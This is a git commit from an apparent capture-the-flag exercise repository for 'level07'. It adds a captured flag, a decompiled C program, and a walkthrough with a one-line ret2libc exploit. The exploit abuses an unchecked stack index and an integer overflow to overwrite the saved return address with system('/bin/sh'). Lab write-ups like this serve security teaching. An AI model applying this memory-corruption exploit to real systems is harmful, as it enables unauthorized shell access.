level07: done
This commit is contained in:
parent
7e4698c71f
commit
aeb8eeced6
1
level07/flag
Normal file
1
level07/flag
Normal file
@ -0,0 +1 @@
|
||||
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
|
1
level07/ressources/exploit
Normal file
1
level07/ressources/exploit
Normal file
@ -0,0 +1 @@
|
||||
(python -c 'print "store\n" + "4159090384\n" "1073741938\n" + "store\n" + "4160264172\n" + "116\n" + "quit\n"'; cat) | ./level07
|
@ -35,10 +35,9 @@ int store_number(char *data)
|
||||
puts(" This index is reserved for wil!");
|
||||
puts(" *** ERROR! ***");
|
||||
return 1;
|
||||
} else {
|
||||
data[4 * index] = number;
|
||||
return 0;
|
||||
}
|
||||
data[4 * index] = number;
|
||||
return 0;
|
||||
}
|
||||
|
||||
int read_number(char *data)
|
||||
@ -47,18 +46,18 @@ int read_number(char *data)
|
||||
|
||||
printf(" Index: ");
|
||||
unum = get_unum();
|
||||
printf(" Number at data[%u] is %u\n", unum, data[4 * unum]);
|
||||
printf(" Number at data[%u] is %c\n", unum, data[4 * unum]);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, const char **argv, const char **envp)
|
||||
{
|
||||
char data[400];
|
||||
char data[400]; // 0xffffda74
|
||||
int number;
|
||||
char s[4];
|
||||
int a = 0, b = 0, c = 0, d = 0;
|
||||
|
||||
s[0] = 0;
|
||||
s[0] = '\0';
|
||||
memset(data, 0, sizeof(data));
|
||||
while (*argv) {
|
||||
memset((void *)*argv, 0, strlen(*argv));
|
||||
@ -93,7 +92,7 @@ int main(int argc, const char **argv, const char **envp)
|
||||
printf(" Failed to do %s command\n", s);
|
||||
else
|
||||
printf(" Completed %s command successfully\n", s);
|
||||
s[0] = 0;
|
||||
s[0] = '\0';
|
||||
a = 0;
|
||||
b = 0;
|
||||
c = 0;
|
||||
|
24
level07/walkthrough
Normal file
24
level07/walkthrough
Normal file
@ -0,0 +1,24 @@
|
||||
# Level07
|
||||
|
||||
Using hexrays, we can decompile the code and see a fascist code.
|
||||
Basically it has 2 functions, `store_number()` and `read_number()` that writes or reads data to a 400 bytes buffer directly through the index.
|
||||
The issue here is that there's no protection on the write to the buffer (except `index % 3`).
|
||||
Since the buffer is on the stack, we could overwrite `eip` and replace it by whatever we want.
|
||||
First, we will need to determine `eip`'s offset to the buffer. To achieve this, let's use `gdb`.
|
||||
We want to break before a call to `store_number` for example (since it has only one argument, `data` buffer will be in `eax`). We then print both the registers and the stack frame (`info registers` and `info frame`).
|
||||
We get the adresses of `eip` and `eax` now let's get the offset. Simply substract both addresses: `0xffffdc3c - 0xffffda74 = 456`.
|
||||
So, at data[456] we have `eip`.
|
||||
We still have 2 issues with this. The first is that the index we input is multiplied by 4 so we have to input `456/4 = 114`, so the real offset is 114.
|
||||
But remember the program prevents us from writing to `index % 3 == 0`.
|
||||
If we input a large number (e.g. `1e20`) into `read_number()`, we see that it is truncated to `MAX_UINT`.
|
||||
We could probably use this to overflow and still print at index 114.
|
||||
Let's find the value to overflow to to get 114:
|
||||
`(MAX_UINT + 1) / 4 + 114`
|
||||
Which is the overflow value for the input index (write to data[index * 4]) + 114. Once we have that, it's almost done.
|
||||
All we have left to do is replace `eip` by a call to `system("/bin/sh")`.
|
||||
Using gdb, we find both addresses (refer to level04 for the exact process).
|
||||
Here, `system == 0xf7e6aed0` and `"/bin/sh" == 0xf7f897ec`.
|
||||
We want to put `0xf7e6aed0` in `eip` and `0xf7f897ec` at `eip + 8` (which is eip's index + 2 in `data` since it's multiplied by 4).
|
||||
|
||||
Here is the final exploit:
|
||||
`(python -c 'print "store\n" + "4159090384\n" "1073741938\n" + "store\n" + "4160264172\n" + "116\n" + "quit\n"'; cat) | ./level07`
|
Loading…
Reference in New Issue
Block a user